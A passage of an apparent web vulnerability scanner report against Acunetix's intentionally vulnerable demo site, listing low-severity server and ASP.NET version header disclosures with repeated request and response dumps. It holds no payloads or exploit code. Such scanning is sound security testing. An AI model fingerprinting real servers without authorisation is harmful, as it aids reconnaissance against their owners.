href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	43
Solution	Ensure that your web server, application server, load balancer, etc. is configured to suppress the "Server" header or provide generic details.
Reference	http://httpd.apache.org/docs/current/mod/core.html#servertokens http://msdn.microsoft.com/en-us/library/ff648552.aspx#ht_urlscan_007 http://blogs.msdn.com/b/varunm/archive/2013/04/23/remove-unwanted-http-response-headers.aspx http://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html
Tags	OWASP_2021_A05 OWASP_2017_A06 WSTG-v42-INFO-02
CWE Id	200
WASC Id	13
Plugin Id	10036

Low	X-AspNet-Version Response Header
Description	Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

URL	http://testaspnet.vulnweb.com
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 219 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 220 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=p2ttr345zecuqfmoxygyermi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a 